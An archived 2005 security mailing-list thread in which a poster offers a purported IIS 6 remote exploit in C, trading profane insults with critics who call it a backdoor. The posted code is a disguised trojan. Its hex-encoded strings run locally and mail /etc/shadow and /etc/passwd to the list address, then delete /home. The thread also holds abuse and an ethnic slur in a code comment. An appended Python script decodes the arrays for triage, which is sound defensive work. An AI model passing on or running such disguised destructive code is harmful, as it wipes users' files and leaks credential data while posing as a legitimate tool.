Date: Thu Apr 21 01:09:03 2005
From: d4yj4y at yahoo.com (Day Jay)
Subject: FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

You are wrong again, it's "Smashing the Stick" you
moron. Not smashing the stack. Ask anyone here!

Man, you are such a newbie. Get a clue and stop trying
to say the sweet code is a backdoor just because you
don't know how to compile software properly. You're
nothing but a newbie wanna be C programmer with a dick
in his ass and a lack of hacking skills.

Die slowly kthxbye!


--- vulcanius <vulcanius@...il.com> wrote:

> Last time I checked it was Smashing the Stack, not Smashing the Stick
> moron. And why the hell do you keep reposting the code when everyone
> already knows it's a lame backdoor attempt?
> 
> On 4/20/05, Day Jay <d4yj4y@...oo.com> wrote:
> > Yes it is you hat squad lamer newbie. Now get it to
> > work!! You fucking newbie.
> > 
> > You're so lame and so is your file system.
> > 
> > --- "class101@...-SQUAD.com" <class101@...-squad.com> wrote:
> > > perfect asshole
> > >
> > > -------------------------------------------------------------
> > > class101
> > > Jr. Researcher
> > > Hat-Squad.com
> > > -------------------------------------------------------------
> > > ----- Original Message -----
> > > From: "Day Jay" <d4yj4y@...oo.com>
> > > To: <full-disclosure@...ts.grok.org.uk>
> > > Sent: Wednesday, April 20, 2005 8:15 PM
> > > Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
> > >
> > >
> > > > Sorry, the previous code was broken. This code should
> > > > work...
> > > >
> > > > Happy Owning!! :)
> > > >
> > > >
> > > > =========SNIP============
> > > > /* Proof of concept code
> > > >     Please don't send us e-mails
> > > >     asking us "how to hack" because
> > > >     we will be forced to skullfsck you.
> > > >
> > > >  DISCLAIMER:
> > > >  !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
> > > >
> > > >     IIS 6 Buffer Overflow Exploit
> > > >
> > > >     BUG: inetinfo.exe improperly bound checks
> > > >     http requests sent longer than 6998 chars.
> > > >     Can get messy but enough testing, and we have
> > > >     found a way in.
> > > >
> > > >     VENDOR STATUS: Notified
> > > >     FIX: In process
> > > >
> > > >     Remote root.
> > > >
> > > >     eg.
> > > >     #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
> > > >      + Connecting to host...
> > > >      + Connected.
> > > >      + Inserting Shellcode...
> > > >      + Done...
> > > >      + Spawining shell..
> > > >
> > > >      Microsoft Windows XP [Version 5.1.2600]
> > > >     (C) Copyright 1985-2001 Microsoft Corp.
> > > >     C:\
> > > >
> > > >
> > > >
> > > >  */
> > > >  char shellcode[] =
> > > >  "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> > > >  "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> > > >  "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> > > >  "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> > > >  "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> > > >  "\x68\x65\x68\x65";
> > > >
> > > >  char launcher [] =
> > > >  "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> > > >  "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> > > >  "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> > > >  "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> > > >  "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> > > >  "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> > > >
> > > >  char netcat_shell [] =
> > > >  "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> > > >  "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> > > >  "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> > > >  "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> > > >  "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> > > >  "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> > > >
> > > >
> > > >  main()
> > > >  {
> > > >
> > > >  file://Section Initialises designs implemented by mexicans
> > > >  file://Imigrate
> > > >  system(launcher);
> > > >  system(netcat_shell);
> > > >  system(shellcode);
> > > >
> > > >  file://int socket = 0;
> > > >  file://double long port = 0.0;
> > > >
> > > >  file://#DEFINE port host address
> > > >  file://#DEFINE number of inters
> > > >  file://#DEFINE gull eeuEE
> > > >
> > > >   //     for(int j; j < 30; j++)
> > > >          {
> > > >          file://Find socket remote address fault
> > > >          printf(".");
> > > >          }
> > > >  file://overtake inetinfo here IIS_666666^
> > > >  return 0;
> > > >  }
> > > >
> > > >
> > > > __________________________________________________
> > > > Do You Yahoo!?
> > > > Tired of spam?  Yahoo! Mail has the best spam protection around
> > > > http://mail.yahoo.com
> > > > _______________________________________________
> > > > Full-Disclosure - We believe in it.
> > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> > >
> > 
> >
> 


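The objection quoted above, that the posted code is a backdoor rather than an exploit, can be checked without compiling anything. The following is an added example and not part of the original thread: it strips the reply markers from the quoted C source, decodes the `\xNN` byte arrays, and flags any array that is plain printable text handed to `system()`. The function names and the 95% printable threshold are assumptions of this example.

```python
import re

# Excerpt of the code quoted in the message above (reply markers kept, as archived).
SAMPLE = r'''
> > > >  char shellcode[] =
> > > >  "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> > > >  "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> > > >  "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> > > >  "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> > > >  "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> > > >  "\x68\x65\x68\x65";
> > > >  system(shellcode);
'''

ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\s*\]\s*=\s*((?:"[^"]*"\s*)+);')
SYSTEM_RE = re.compile(r'\bsystem\s*\(\s*(\w+)\s*\)')
HEX_RE = re.compile(r'\\x([0-9a-fA-F]{2})')

def strip_quotes(text):
    """Drop leading '> ' reply markers so the C source can be parsed."""
    return "\n".join(re.sub(r'^(?:>\s?)+', '', ln) for ln in text.splitlines())

def decode_literal(chunks):
    """Join adjacent C string literals; only \\xNN escapes are decoded (all the page uses)."""
    body = "".join(re.findall(r'"([^"]*)"', chunks))
    return bytes(int(h, 16) for h in HEX_RE.findall(body))

def triage(text):
    """Return one finding per byte array: decoded text, printable ratio, system() use."""
    src = strip_quotes(text)
    shelled = set(SYSTEM_RE.findall(src))
    findings = []
    for name, chunks in ARRAY_RE.findall(src):
        raw = decode_literal(chunks)
        printable = sum(32 <= b < 127 for b in raw) / max(len(raw), 1)
        findings.append({
            "name": name,
            "text": raw.decode("latin-1"),
            "printable": printable,
            # Machine code is mostly non-printable and is not passed to system().
            "suspicious": printable > 0.95 and name in shelled,
        })
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"{f['name']}: printable={f['printable']:.0%} suspicious={f['suspicious']}")
        print("  ->", repr(f["text"]))
```

Fed the whole quoted message instead of the excerpt, the same check also covers the `launcher` and `netcat_shell` arrays.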
